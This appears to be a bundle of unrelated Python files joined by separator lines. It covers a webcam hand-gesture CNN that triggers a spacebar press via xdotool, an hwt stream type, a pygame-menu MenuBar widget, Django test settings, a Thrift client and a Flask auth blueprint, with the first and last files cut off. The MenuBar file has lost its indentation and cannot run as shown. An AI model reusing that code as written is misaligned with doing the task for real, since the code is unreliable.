    #cv2.imshow("Blur", mask)

    #bitwise and mask original frame
    res = cv2.bitwise_and(roi, roi, mask = mask)
    # color to grayscale
    res = cv2.cvtColor(res, cv2.COLOR_BGR2GRAY)

    if saveImg == True:
        saveROIImg(res)
    elif guessGesture == True:
        retgesture = myNN.guessGesture(mod, res)
        # Only react when the prediction actually changes between frames.
        if lastgesture != retgesture :
            lastgesture = retgesture
            print myNN.output[lastgesture]

            # Gesture index 3 triggers a spacebar press via xdotool
            # (used to make the Chrome Dino jump).
            if lastgesture == 3:
                import subprocess
                subprocess.call(["xdotool", "type", ' '])
                print myNN.output[lastgesture] + "= Dino JUMP!"
                time.sleep(0.01 )
            #guessGesture = False
    elif visualize == True:
        layer = int(raw_input("Enter which layer to visualize "))
        cv2.waitKey(0)
        myNN.visualizeLayers(mod, res, layer)
        visualize = False

    return res
#%%
def binaryMask(frame, x0, y0, width, height ):
    """Draw the ROI box on ``frame`` and return a binary-thresholded ROI.

    Pipeline: grayscale -> Gaussian blur -> adaptive threshold -> inverse
    binary threshold with Otsu. Depending on the global flags the result is
    additionally saved to disk, classified by the CNN, or used for layer
    visualization.
    """
    global guessGesture, visualize, mod, lastgesture, saveImg

    cv2.rectangle(frame, (x0,y0),(x0+width,y0+height),(0,255,0),1)
    roi = frame[y0:y0+height, x0:x0+width]

    gray = cv2.cvtColor(roi, cv2.COLOR_BGR2GRAY)
    blur = cv2.GaussianBlur(gray,(5,5),2)
    #blur = cv2.bilateralFilter(roi,9,75,75)

    th3 = cv2.adaptiveThreshold(blur,255,cv2.ADAPTIVE_THRESH_GAUSSIAN_C,cv2.THRESH_BINARY_INV,11,2)
    ret, res = cv2.threshold(th3, minValue, 255, cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU)
    #ret, res = cv2.threshold(blur, minValue, 255, cv2.THRESH_BINARY +cv2.THRESH_OTSU)

    if saveImg == True:
        saveROIImg(res)
    elif guessGesture == True:
        retgesture = myNN.guessGesture(mod, res)
        # Only react when the prediction actually changes between frames.
        if lastgesture != retgesture :
            lastgesture = retgesture

            #print lastgesture

            ## Checking for only PUNCH gesture here
            ## Run this app in Prediction Mode and keep Chrome browser on focus with Internet Off
            ## And have fun :) with Dino
            if lastgesture == 3:
                import subprocess
                subprocess.call(["xdotool", "type", ' '])
                #jump = ''' osascript -e 'tell application "System Events" to key code 49' '''
                #jump = ''' osascript -e 'tell application "System Events" to key down (49)' '''
                #os.system(jump)
                print myNN.output[lastgesture] + "= Dino JUMP!"

            #time.sleep(0.01 )
            #guessGesture = False
    elif visualize == True:
        layer = int(raw_input("Enter which layer to visualize "))
        cv2.waitKey(1)
        myNN.visualizeLayers(mod, res, layer)
        visualize = False

    return res
#%%
def Main():
    """Interactive entry point: load or train the CNN, then run the webcam loop.

    In-loop keyboard controls: b (toggle mask mode), g (toggle prediction),
    q (quiet mode), i/j/k/l (move ROI), s (start/stop capture),
    n (new gesture folder name), ESC (exit).
    """
    global guessGesture, visualize, mod, binaryMode, x0, y0, width, height, saveImg, gestname, path

    quietMode = False

    # On-screen help text layout: font, scale, origin and line height in px.
    font = cv2.FONT_HERSHEY_SIMPLEX
    size = 0.5
    fx = 10
    fy = 355
    fh = 18

    #Call CNN model loading callback
    while True:
        ans = int(raw_input( banner))
        if ans == 2:
            # Train from scratch; loadCNN(-1) builds a fresh (unweighted) model.
            mod = myNN.loadCNN(-1)
            myNN.trainModel(mod)
            raw_input("Press any key to continue")
            break
        elif ans == 1:
            print "Will load default weight file"
            mod = myNN.loadCNN(0)
            break
        elif ans == 3:
            # Feature-map visualization; loads a model first if none is loaded.
            if not mod:
                w = int(raw_input("Which weight file to load (0 or 1)"))
                mod = myNN.loadCNN(w)
            else:
                print "Will load default weight file"
            img = int(raw_input("Image number "))
            layer = int(raw_input("Enter which layer to visualize "))
            myNN.visualizeLayers(mod, img, layer)
            raw_input("Press any key to continue")
            continue
        else:
            print "Get out of here!!!"
            return 0

    ## Grab camera input
    cap = cv2.VideoCapture(0)
    cv2.namedWindow('Original', cv2.WINDOW_NORMAL)

    # set rt size as 640x480
    ret = cap.set(3,640)
    ret = cap.set(4,480)

    while(True):
        ret, frame = cap.read()
        max_area = 0
        # flip code 3 is nonstandard (cv2 documents -1/0/1); behaves like a
        # positive code, i.e. horizontal mirror -- NOTE(review): confirm intent.
        frame = cv2.flip(frame, 3)

        if ret == True:
            if binaryMode == True:
                roi = binaryMask(frame, x0, y0, width, height)
            else:
                roi = skinMask(frame, x0, y0, width, height)

        cv2.putText(frame,'Options:',(fx,fy), font, 0.7,(0,255,0),2,1)
        cv2.putText(frame,'b - Toggle Binary/SkinMask',(fx,fy + fh), font, size,(0,255,0),1,1)
        cv2.putText(frame,'g - Toggle Prediction Mode',(fx,fy + 2*fh), font, size,(0,255,0),1,1)
        cv2.putText(frame,'q - Toggle Quiet Mode',(fx,fy + 3*fh), font, size,(0,255,0),1,1)
        cv2.putText(frame,'n - To enter name of new gesture folder',(fx,fy + 4*fh), font, size,(0,255,0),1,1)
        cv2.putText(frame,'s - To start capturing new gestures for training',(fx,fy + 5*fh), font, size,(0,255,0),1,1)
        cv2.putText(frame,'ESC - Exit',(fx,fy + 6*fh), font, size,(0,255,0),1,1)

        ## If enabled will stop updating the main openCV windows
        ## Way to reduce some processing power :)
        if not quietMode:
            cv2.imshow('Original',frame)
            cv2.imshow('ROI', roi)

        # Keyboard inputs
        key = cv2.waitKey(10) & 0xff

        ## Use Esc key to close the program
        if key == 27:
            break

        ## Use b key to toggle between binary threshold or skinmask based filters
        elif key == ord('b'):
            binaryMode = not binaryMode
            if binaryMode:
                print "Binary Threshold filter active"
            else:
                print "SkinMask filter active"

        ## Use g key to start gesture predictions via CNN
        elif key == ord('g'):
            guessGesture = not guessGesture
            print "Prediction Mode - {}".format(guessGesture)

        ## This option is not yet complete. So disabled for now
        ## Use v key to visualize layers
        #elif key == ord('v'):
        #    visualize = True

        ## Use i,j,k,l to adjust ROI window
        elif key == ord('i'):
            y0 = y0 - 5
        elif key == ord('k'):
            y0 = y0 + 5
        elif key == ord('j'):
            x0 = x0 - 5
        elif key == ord('l'):
            x0 = x0 + 5

        ## Quiet mode to hide gesture window
        elif key == ord('q'):
            quietMode = not quietMode
            print "Quiet Mode - {}".format(quietMode)

        ## Use s key to start/pause/resume taking snapshots
        ## numOfSamples controls number of snapshots to be taken PER gesture
        elif key == ord('s'):
            saveImg = not saveImg
            if gestname != '':
                saveImg = True
            else:
                print "Enter a gesture group name first, by pressing 'n'"
                saveImg = False

        ## Use n key to enter gesture name
        elif key == ord('n'):
            gestname = raw_input("Enter the gesture folder name: ")
            try:
                os.makedirs(gestname)
            except OSError as e:
                # if directory already present (errno 17 == EEXIST)
                if e.errno != 17:
                    print 'Some issue while creating the directory named -' + gestname
            path = "./"+gestname+"/"

        #elif key != 255:
        #    print key

    #Realse & destroy
    cap.release()
    cv2.destroyAllWindows()


if __name__ == "__main__":
    Main()
|
from math import inf, isinf
from typing import List, Optional
from hwt.doc_markers import internal
from hwt.hdl.types.hdlType import HdlType
from hwt.serializer.generic.indent import getIndent
class HStream(HdlType):
    """
    Stream is an abstract type. It is an array with unspecified size.

    :ivar ~.element_t: type of the smallest chunk of data
        which can be sent over this stream
    :ivar ~.len_min: minimum repetitions of element_t (inclusive interval)
    :ivar ~.len_max: maximum repetitions of element_t (inclusive interval)
    :ivar ~.start_offsets: list of numbers which represents the number of invalid bytes
        before valid data on stream (invalid bytes means the bytes
        which does not have bit validity set, e.g. Axi4Stream keep=0b10 -> offset=1
        )
    """

    def __init__(self, element_t,
                 frame_len=inf,
                 start_offsets: Optional[List[int]]=None,
                 const=False):
        """
        :param frame_len: either a single int (exact repetition count), inf
            (any length >= 1) or an inclusive (min, max) tuple
        """
        super(HStream, self).__init__(const=const)
        self.element_t = element_t
        # Normalize frame_len into the inclusive (len_min, len_max) interval.
        if isinstance(frame_len, float) and isinf(frame_len):
            frame_len = (1, inf)
        elif isinstance(frame_len, int):
            frame_len = (frame_len, frame_len)
        self.len_min, self.len_max = frame_len

        if start_offsets is None:
            start_offsets = (0, )
        # stored as a tuple so instances stay hashable (see __hash__)
        self.start_offsets = tuple(start_offsets)

    def bit_length(self):
        """Total width in bits; defined only for constant-length streams."""
        if self.len_min != self.len_max or isinf(self.len_max):
            raise TypeError("This HStream does not have constant size", self)
        else:
            # len_min == len_max
            return self.len_min * self.element_t.bit_length()

    def __eq__(self, other: HdlType):
        # Equal iff same concrete class, identical length interval and
        # offsets, and equal element types.
        if self is other:
            return True
        if (type(self) is type(other)):
            if self.start_offsets == other.start_offsets \
                    and self.len_min == other.len_min \
                    and self.len_max == other.len_max:
                return self.element_t == other.element_t
        return False

    def __hash__(self):
        # Consistent with __eq__: built from the same four components.
        return hash((self.start_offsets, self.len_min, self.len_max, self.element_t))

    @internal
    @classmethod
    def getValueCls(cls):
        """Lazily resolve and cache the value class (defers the import to
        avoid a circular dependency with hwt.hdl.types.streamVal)."""
        try:
            return cls._valCls
        except AttributeError:
            from hwt.hdl.types.streamVal import HStreamVal
            cls._valCls = HStreamVal
            return cls._valCls

    def __repr__(self, indent=0, withAddr=None, expandStructs=False):
        """Indented, human-readable description of this stream type."""
        return "%s<%s len:%s, align:%r\n%s>" % (
            getIndent(indent),
            self.__class__.__name__,
            (self.len_min, self.len_max),
            self.start_offsets,
            self.element_t.__repr__(indent=indent+1,
                                    withAddr=withAddr,
                                    expandStructs=expandStructs),
        )
|
"""
pygame-menu
https://github.com/ppizarror/pygame-menu
MENUBAR
MenuBar class to display the Menu title.
License:
-------------------------------------------------------------------------------
The MIT License (MIT)
Copyright 2017-2021 Pablo Pizarro R. @ppizarror
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software
is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
-------------------------------------------------------------------------------
"""
# File constants no. 1000
__all__ = [
# Main class
'MenuBar',
# Menubar styles
'MENUBAR_STYLE_ADAPTIVE',
'MENUBAR_STYLE_SIMPLE',
'MENUBAR_STYLE_TITLE_ONLY',
'MENUBAR_STYLE_TITLE_ONLY_DIAGONAL',
'MENUBAR_STYLE_NONE',
'MENUBAR_STYLE_UNDERLINE',
'MENUBAR_STYLE_UNDERLINE_TITLE',
# Custom types
'MenuBarStyleModeType'
]
import pygame
import pygame.gfxdraw as gfxdraw
import pygame_menu.controls as ctrl
from pygame_menu.locals import FINGERUP, POSITION_EAST, POSITION_WEST, POSITION_NORTH, \
POSITION_SOUTH
from pygame_menu.utils import assert_color, get_finger_pos, warn
from pygame_menu.widgets.core import Widget
from pygame_menu._types import Tuple, CallbackType, Tuple2IntType, Literal, Any, \
Optional, NumberInstance, ColorInputType, EventVectorType, VectorInstance, \
List, ColorType, NumberType
# Menubar styles
MENUBAR_STYLE_ADAPTIVE = 1000
MENUBAR_STYLE_SIMPLE = 1001
MENUBAR_STYLE_TITLE_ONLY = 1002
MENUBAR_STYLE_TITLE_ONLY_DIAGONAL = 1003
MENUBAR_STYLE_NONE = 1004
MENUBAR_STYLE_UNDERLINE = 1005
MENUBAR_STYLE_UNDERLINE_TITLE = 1006
# Menubar operation modes
_MODE_CLOSE = 1020
_MODE_BACK = 1021
# Custom types
MenuBarStyleModeType = Literal[MENUBAR_STYLE_ADAPTIVE, MENUBAR_STYLE_SIMPLE,
MENUBAR_STYLE_TITLE_ONLY,
MENUBAR_STYLE_TITLE_ONLY_DIAGONAL,
MENUBAR_STYLE_NONE, MENUBAR_STYLE_UNDERLINE,
MENUBAR_STYLE_UNDERLINE_TITLE]
# noinspection PyMissingOrEmptyDocstring
class MenuBar(Widget):
"""
MenuBar widget.
.. note::
This widget does not accept scale/resize transformation.
:param title: Title of the menubar
:param width: Width of the widget, generally width of the Menu
:param background_color: Background color
:param menubar_id: ID of the MenuBar
:param back_box: Draw a back-box button on header
:param back_box_background_color: Back-box button color
:param mode: Mode of drawing the bar
:param modify_scrollarea: If ``True`` it modifies the scrollbars of the scrollarea depending on the bar mode
:param offsetx: Offset x-position of title in px
:param offsety: Offset y-position of title in px
:param onreturn: Callback when pressing the back-box button
:param args: Optional arguments for callbacks
:param kwargs: Optional keyword arguments for callbacks
"""
_backbox: bool
_backbox_background_color: ColorType
_backbox_border_width: int
_backbox_pos: Any
_backbox_rect: Optional['pygame.Rect']
_box_mode: int
_modify_scrollarea: bool
_offsetx: NumberType
_offsety: NumberType
_polygon_pos: Any
_scrollbar_deltas: List[Tuple[int, Tuple2IntType]]
_style: int
_width: int
fixed: bool
def __init__(
self,
title: Any,
width: NumberType,
background_color: ColorInputType,
menubar_id: str = '',
back_box: bool = False,
back_box_background_color: ColorInputType = (0, 0, 0),
mode: MenuBarStyleModeType = MENUBAR_STYLE_ADAPTIVE,
modify_scrollarea: bool = True,
offsetx: NumberType = 0,
offsety: NumberType = 0,
onreturn: CallbackType = None,
*args,
**kwargs
) -> None:
assert isinstance(width, NumberInstance)
assert isinstance(back_box, bool)
background_color = assert_color(background_color)
back_box_background_color = assert_color(back_box_background_color)
# MenuBar has no ID
super(MenuBar, self).__init__(
args=args,
kwargs=kwargs,
onreturn=onreturn,
title=title,
widget_id=menubar_id
)
self._backbox = back_box
self._backbox_background_color = back_box_background_color
self._backbox_border_width = 1 # px
self._backbox_pos = None
self._backbox_rect = None
self._background_color = background_color
self._box_mode = 0
self._modify_scrollarea = modify_scrollarea
self._mouseover_check_rect = lambda: self._backbox_rect
self._offsetx = 0
self._offsety = 0
self._polygon_pos = None
# north, east, south, west
self._scrollbar_deltas = [(0, (0, 0)), (0, (0, 0)), (0, (0, 0)), (0, (0, 0))]
self._style = mode
self._title = ''
self._width = int(width)
self.set_title(title, offsetx, offsety)
# Public's
self.is_selectable = False
self.fixed = True
def _apply_font(self) -> None:
pass
def set_padding(self, *args, **kwargs) -> 'MenuBar':
return self
def scale(self, *args, **kwargs) -> 'MenuBar':
return self
def resize(self, *args, **kwargs) -> 'MenuBar':
return self
def rotate(self, *args, **kwargs) -> 'MenuBar':
return self
def set_max_height(self, *args, **kwargs) -> 'MenuBar':
return self
def set_max_width(self, *args, **kwargs) -> 'MenuBar':
return self
def set_selection_effect(self, *args, **kwargs) -> 'MenuBar':
return self
def set_border(self, *args, **kwargs) -> 'MenuBar':
return self
def flip(self, *args, **kwargs) -> 'MenuBar':
return self
def _check_title_color(self, background_menu: bool) -> None:
"""
Performs title color and prints a warning if the color is similar to the
background.
:return: None
"""
if background_menu and self._menu is not None:
c_back = self._menu.get_theme().background_color
else:
c_back = self._background_color
if not isinstance(c_back, VectorInstance): # If is color
return
tol = 5
c_dif_1 = abs(c_back[0] - self._font_color[0])
c_dif_2 = abs(c_back[1] - self._font_color[1])
c_dif_3 = abs(c_back[2] - self._font_color[2])
if c_dif_1 < tol and c_dif_2 < tol and c_dif_3 < tol:
warn(
'title font color {0} is {3} to the {1} background color {2}, '
'consider editing your Theme'.format(
self._font_color,
'menu' if background_menu else 'title',
c_back,
'equal' if c_dif_1 == c_dif_2 == c_dif_3 == 0 else 'similar'
)
)
def get_title_offset(self) -> Tuple2IntType:
"""
Return the title offset on x-axis and y-axis (x, y) in px.
:return: Title offset
"""
return int(self._offsetx), int(self._offsety)
def set_backbox_border_width(self, width: int) -> None:
"""
Set backbox border width in px.
:param width: Width in px
:return: None
"""
assert isinstance(width, int)
assert width > 0
self._backbox_border_width = width
def _draw_background_color(self, *args, **kwargs) -> None:
pass
def _draw_border(self, *args, **kwargs) -> None:
pass
def _backbox_visible(self) -> bool:
"""
Returns ``True`` if backbox is visible.
:return: Bool
"""
# The following check belongs to the case if the Menu displays a "x" button
# to close the Menu, but onclose Menu method is None (Nothing is executed),
# then the button will not be displayed
# noinspection PyProtectedMember
return self._mouse_enabled and self._backbox and \
not (self._box_mode == _MODE_CLOSE and
self._menu is not None and
self._menu._onclose is None)
def _draw(self, surface: 'pygame.Surface') -> None:
if len(self._polygon_pos) > 2:
gfxdraw.filled_polygon(surface, self._polygon_pos, self._background_color)
# Draw backbox if enabled
if self._backbox_visible():
# noinspection PyArgumentList
pygame.draw.rect(surface, self._backbox_background_color,
self._backbox_rect, self._backbox_border_width)
pygame.draw.polygon(surface, self._backbox_background_color,
self._backbox_pos)
surface.blit(self._surface,
(self._rect.topleft[0] + self._offsetx,
self._rect.topleft[1] + self._offsety))
def get_scrollbar_style_change(self, position: str) -> Tuple[int, Tuple2IntType]:
"""
Return scrollbar change (width, position) depending on the style of the
menubar.
:param position: Position of the scrollbar
:return: Change in length and position in px
"""
self._render()
if not self._modify_scrollarea or not self.is_visible():
return 0, (0, 0)
if not self.fixed or self.is_floating():
if self._style == MENUBAR_STYLE_ADAPTIVE:
if position == POSITION_EAST:
t = self._polygon_pos[4][1] - self._polygon_pos[2][1]
return t, (0, -t)
return 0, (0, 0)
if position == POSITION_NORTH:
return self._scrollbar_deltas[0]
elif position == POSITION_EAST:
return self._scrollbar_deltas[1]
elif position == POSITION_SOUTH:
return self._scrollbar_deltas[2]
elif position == POSITION_WEST:
return self._scrollbar_deltas[3]
return 0, (0, 0)
def _render(self) -> Optional[bool]:
if self._menu is None:
return
# noinspection PyProtectedMember
menu_prev_condition = not self._menu or not self._menu._top or not self._menu._top._prev
if not self._render_hash_changed(
self._menu.get_id(), self._rect.x, self._rect.y, self._title,
self._visible, self._font_selected_color, menu_prev_condition):
return True
# Update box mode
if menu_prev_condition:
self._box_mode = _MODE_CLOSE
else:
self._box_mode = _MODE_BACK
self._surface = self._render_string(self._title, self._font_selected_color)
self._rect.width, self._rect.height = self._surface.get_size()
self._apply_transforms() # Rotation does not affect rect size
dy = 0
if self._style == MENUBAR_STYLE_ADAPTIVE:
"""
A-------------------B D-E: 25 dx
|**** x | *0,6 height
| D------------C
F----E/
"""
a = self._rect.x, self._rect.y
b = self._rect.x + self._width - 1, self._rect.y
c = self._rect.x + self._width - 1, self._rect.y + self._rect.height * 0.6
d = self._rect.x + self._rect.width + 25 + self._offsetx, \
self._rect.y + self._rect.height * 0.6
e = self._rect.x + self._rect.width + 5 + self._offsetx, \
self._rect.y + self._rect.height
f = self._rect.x, self._rect.y + self._rect.height
self._polygon_pos = a, b, c, d, e, f
cross_size = int(self._rect.height * 0.6)
self._scrollbar_deltas = [(0, (0, self._rect.height)),
(-cross_size, (0, cross_size)),
(0, (0, 0)),
(-self._rect.height, (0, self._rect.height))]
self._check_title_color(background_menu=False)
elif self._style == MENUBAR_STYLE_SIMPLE:
"""
A-------------------B
|**** x | *1,0 height
D-------------------C
"""
a = self._rect.x, self._rect.y
b = self._rect.x + self._width - 1, self._rect.y
c = self._rect.x + self._width - 1, self._rect.y + self._rect.height
d = self._rect.x, self._rect.y + self._rect.height
self._polygon_pos = a, b, c, d
cross_size = int(self._rect.height * self._backbox_visible())
self._scrollbar_deltas = [(0, (0, self._rect.height)),
(-self._rect.height, (0, self._rect.height)),
(0, (0, 0)),
(-self._rect.height, (0, self._rect.height))]
self._check_title_color(background_menu=False)
elif self._style == MENUBAR_STYLE_TITLE_ONLY:
"""
A-----B
| *** | x *0,6 height
D-----C
"""
a = self._rect.x, self._rect.y
b = self._rect.x + self._rect.width + 5 + self._offsetx, self._rect.y
c = self._rect.x + self._rect.width + 5 + self._offsetx, \
self._rect.y + self._rect.height
d = self._rect.x, self._rect.y + self._rect.height
self._polygon_pos = a, b, c, d
cross_size = int(self._rect.height * 0.6 * self._backbox_visible())
self._scrollbar_deltas = [(0, (0, self._rect.height)),
(-cross_size, (0, cross_size)),
(0, (0, 0)),
(-self._rect.height, (0, self._rect.height))]
self._check_title_color(background_menu=False)
elif self._style == MENUBAR_STYLE_TITLE_ONLY_DIAGONAL:
"""
A--------B
| **** / x *0,6 height
D-----C
"""
a = self._rect.x, self._rect.y
b = self._rect.x + self._rect.width + 25 + self._offsetx, self._rect.y
c = self._rect.x + self._rect.width + 5 + self._offsetx, \
self._rect.y + self._rect.height
d = self._rect.x, self._rect.y + self._rect.height
self._polygon_pos = a, b, c, d
cross_size = int(self._rect.height * 0.6 * self._backbox_visible())
self._scrollbar_deltas = [(0, (0, self._rect.height)),
(-cross_size, (0, cross_size)),
(0, (0, 0)),
(-self._rect.height, (0, self._rect.height))]
self._check_title_color(background_menu=False)
elif self._style == MENUBAR_STYLE_NONE:
"""
A------------------B
**** x *0,6 height
"""
a = self._rect.x, self._rect.y
b = self._rect.x + self._width - 1, self._rect.y
self._polygon_pos = a, b
cross_size = int(self._rect.height * 0.6 * self._backbox_visible())
self._scrollbar_deltas = [(0, (0, self._rect.height)),
(-cross_size, (0, cross_size)),
(0, (0, 0)),
(-self._rect.height, (0, self._rect.height))]
self._check_title_color(background_menu=True)
elif self._style == MENUBAR_STYLE_UNDERLINE:
"""
**** x
A-------------------B *0,09 height
D-------------------C
"""
# dy = 0
a = self._rect.x, self._rect.y + 0.91 * self._rect.height + dy
b = self._rect.x + self._width - 1, self._rect.y + 0.91 * self._rect.height + dy
c = self._rect.x + self._width - 1, self._rect.y + self._rect.height + dy
d = self._rect.x, self._rect.y + self._rect.height + dy
self._polygon_pos = a, b, c, d
cross_size = int(0.6 * self._rect.height * self._backbox_visible())
self._scrollbar_deltas = [(0, (0, self._rect.height)),
(-self._rect.height, (0, self._rect.height)),
(0, (0, 0)),
(-self._rect.height, (0, self._rect.height))]
self._check_title_color(background_menu=True)
elif self._style == MENUBAR_STYLE_UNDERLINE_TITLE:
"""
**** x
A----B *0,09 height
D----C
"""
# dy = 3
a = self._rect.x, self._rect.y + 0.91 * self._rect.height + dy
b = self._rect.x + self._rect.width + 5 + self._offsetx, \
self._rect.y + 0.91 * self._rect.height + dy
c = self._rect.x + self._rect.width + 5 + self._offsetx, \
self._rect.y + self._rect.height + dy
d = self._rect.x, self._rect.y + self._rect.height + dy
self._polygon_pos = a, b, c, d
cross_size = int(0.6 * self._rect.height * self._backbox_visible())
self._scrollbar_deltas = [(0, (0, self._rect.height)),
(-cross_size, (0, cross_size)),
(0, (0, 0)),
(-self._rect.height, (0, self._rect.height))]
self._check_title_color(background_menu=True)
else:
raise ValueError('invalid menubar mode {0}'.format(self._style))
self._rect.height += dy
# Create the back box
if self._backbox:
backbox_margin = 4
# Subtract the scrollarea thickness if float and enabled
scroll_delta = 0
if self._floating and self._menu is not None:
scroll_delta = self._menu.get_width() - self._menu.get_width(inner=True)
self._backbox_rect = pygame.Rect(
int(self._rect.x + self._width - cross_size + backbox_margin - scroll_delta),
int(self._rect.y + backbox_margin),
int(cross_size - 2 * backbox_margin),
int(cross_size - 2 * backbox_margin)
)
if self._box_mode == _MODE_CLOSE:
# Make a cross for top Menu
self._backbox_pos = (
(self._backbox_rect.left + 4, self._backbox_rect.top + 4),
(self._backbox_rect.centerx, self._backbox_rect.centery),
(self._backbox_rect.right - 4, self._backbox_rect.top + 4),
(self._backbox_rect.centerx, self._backbox_rect.centery),
(self._backbox_rect.right - 4, self._backbox_rect.bottom - 4),
(self._backbox_rect.centerx, self._backbox_rect.centery),
(self._backbox_rect.left + 4, self._backbox_rect.bottom - 4),
(self._backbox_rect.centerx, self._backbox_rect.centery),
(self._backbox_rect.left + 4, self._backbox_rect.top + 4)
)
elif self._box_mode == _MODE_BACK:
# Make a back arrow for sub-menus
self._backbox_pos = (
(self._backbox_rect.left + 5, self._backbox_rect.centery),
(self._backbox_rect.centerx, self._backbox_rect.top + 5),
(self._backbox_rect.centerx, self._backbox_rect.centery - 2),
(self._backbox_rect.right - 5, self._backbox_rect.centery - 2),
(self._backbox_rect.right - 5, self._backbox_rect.centery + 2),
(self._backbox_rect.centerx, self._backbox_rect.centery + 2),
(self._backbox_rect.centerx, self._backbox_rect.bottom - 5),
(self._backbox_rect.left + 5, self._backbox_rect.centery)
)
def set_title(self, title: Any, offsetx: NumberType = 0, offsety: NumberType = 0) -> 'MenuBar':
"""
Set the menubar title.
:param title: Menu title
:param offsetx: Offset x-position of title in px
:param offsety: Offset y-position of title in px
:return: Self reference
"""
assert isinstance(offsetx, NumberInstance)
assert isinstance(offsety, NumberInstance)
self._title = str(title)
self._offsety = offsety
self._offsetx = offsetx
if self._menu is not None:
self._render()
return self
def get_height(self, apply_padding: bool = True, apply_selection: bool = False) -> int:
if self._floating or not self.is_visible():
return 0
return super(MenuBar, self).get_height(apply_padding, apply_selection)
def update(self, events: EventVectorType) -> bool:
self.apply_update_callbacks(events)
if self.readonly or not self.is_visible():
return False
updated = False
for event in events:
# Check mouse over
if self._backbox_visible():
self._check_mouseover(event)
# User clicks/touches the backbox rect; don't consider the mouse wheel (button 4 & 5)
if event.type == pygame.MOUSEBUTTONUP and self._mouse_enabled and \
event.button in (1, 2, 3) or \
event.type == FINGERUP and self._touchscreen_enabled and \
self._menu is not None:
event_pos = get_finger_pos(self._menu, event)
if self._backbox_rect and self._backbox_rect.collidepoint(*event_pos):
self._sound.play_click_mouse()
self.apply()
updated = True
# User applies joy back button
elif event.type == pygame.JOYBUTTONDOWN and self._joystick_enabled:
if event.button == ctrl.JOY_BUTTON_BACK:
self._sound.play_key_del()
self.apply()
updated = True
return updated
|
# Minimal Django settings module used for running the test suite.

DEBUG = True

# SQLite engine with no NAME: sufficient for tests that never touch the DB file.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
    }
}

INSTALLED_APPS = [
    'tests.testapp',
]

# Cache backend under test: redis_cache pointed at a local Redis instance,
# using DB 15 to stay clear of any real data.
CACHES = {
    'default': {
        'BACKEND': 'redis_cache.RedisCache',
        'LOCATION': '127.0.0.1:6379',
        'OPTIONS': { # optional
            'DB': 15,
            'PASSWORD': 'yadayada',
        },
    },
}

ROOT_URLCONF = 'tests.urls'
|
from thrift.transport import TSocket
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
from .gen_inbox.inbox import TInboxService
class Client:
    """Thin synchronous wrapper around the generated TInboxService client.

    Opens a buffered binary-protocol connection on construction. The
    connection can be released explicitly via :meth:`close`, by using the
    instance as a context manager, or (best-effort) on garbage collection.

    Fixes: the original ``__del__`` unconditionally called ``close()``,
    which raised ``AttributeError`` if ``__init__`` failed before
    ``_transport`` was assigned (e.g. on a connect error).
    """

    def __init__(self, ip_address, port, timeout=10000):
        # Set early so __del__/close are safe even if construction fails below.
        self._transport = None
        self._socket = TSocket.TSocket(ip_address, port)
        # timeout is in milliseconds (thrift TSocket convention).
        self._socket.setTimeout(timeout)
        self._transport = TTransport.TBufferedTransport(self._socket)
        self._protocol = TBinaryProtocol.TBinaryProtocol(self._transport)
        self._tclient = TInboxService.Client(self._protocol)
        self._transport.open()

    def __enter__(self):
        # Enable ``with Client(...) as c:`` for deterministic cleanup.
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        self.close()
        return False

    def __del__(self):
        # Best-effort cleanup; never raise from a finalizer.
        try:
            self.close()
        except Exception:
            pass

    def close(self):
        """Close the underlying transport if it is open (idempotent)."""
        transport = getattr(self, '_transport', None)
        if transport is not None and transport.isOpen():
            transport.close()

    def push(self, inbox_name, message_text):
        """Append ``message_text`` to ``inbox_name``; returns the service reply."""
        return self._tclient.push(inbox_name=inbox_name, message_text=message_text)

    def fetch(self, inbox_name, n, offset):
        """Fetch ``n`` messages from ``inbox_name`` starting at ``offset``."""
        return self._tclient.fetch(inbox_name=inbox_name, n=n, offset=offset)
|
from flask import Blueprint
from pf_auth.dto.operator_dto import LoginResponseDto, LoginDto, RefreshTokenDto, LoginTokenDto, RefreshTokenResponseDto
from pf_auth.service.operator_service import OperatorService
from pfms.swagger.pfms_swagger_decorator import simple_get, pfms_post_request
# Blueprint exposing operator (admin user) endpoints under /api/v1/operator.
operator_controller = Blueprint("operator_controller", __name__, url_prefix="/api/v1/operator")
operator_service = OperatorService()


@operator_controller.route("/init", methods=['GET'])
@simple_get(only_message=True)
def initialize():
    """Create the default operator account if it does not already exist."""
    is_created = operator_service.init_default_operator()
    if is_created:
        return operator_service.success("Successfully Initialized")
    return operator_service.error("Unable to Initialize")


@operator_controller.route("/login", methods=["POST"])
@pfms_post_request(request_body=LoginDto, response_obj=LoginResponseDto)
def login():
    """Authenticate an operator; request/response shapes are given by the DTOs."""
    return operator_service.login_operator()


@operator_controller.route("/renew-token", methods=["POST"])
@pfms_post_request(request_body=RefreshTokenDto, response_obj=RefreshTokenResponseDto)
def renew_token():
    """Exchange a refresh token for a new access token."""
    return operator_service.renew_token()


@operator_controller.route("/test", methods=['GET'])
@simple_get(only_message=True)
def test():
    """Smoke-test endpoint; always responds with an error-style message."""
    return operator_service.error("Test Actions")
|
# Why this file exists:
# This file exists because of the circular dependency between emu.instruction
# and util.parse. Doing any sort of `from util.parse import` in emu.instruction
# will fail because util.parse also requires emu.instruction.Instruction,
# which has not been loaded yet at import time. So we use this shared file
# instead. Alternatively, all the `from util.parse import` lines could go
# beneath the Instruction class declaration, but that's messy.
def get_imm(imm):
    """Parse an immediate operand string into an int.

    Strings prefixed with '0x' (or '0X' — the old startswith('0x') check
